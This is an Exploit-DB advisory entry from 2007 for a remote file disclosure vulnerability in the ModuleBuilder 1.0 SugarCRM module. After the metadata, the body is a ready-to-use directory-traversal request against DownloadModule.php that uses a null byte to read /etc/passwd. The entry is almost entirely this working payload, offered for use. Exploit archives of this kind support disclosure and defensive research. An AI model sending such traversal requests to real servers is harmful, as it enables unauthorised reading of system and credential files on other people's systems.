ModuleBuilder 1.0 - 'file' Remote File Disclosure

EDB-ID:

4591


Author:

GoLd_M

Type:

webapps


Platform:

PHP

Date:

2007-10-31


ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability
http://www.sugarforge.org/frs/download.php/1274/install_ModuleBuilderV1.0.zip
/modules/Builder/DownloadModule.php?file=../../../../../../../../etc/passwd%00

# milw0rm.com [2007-10-31]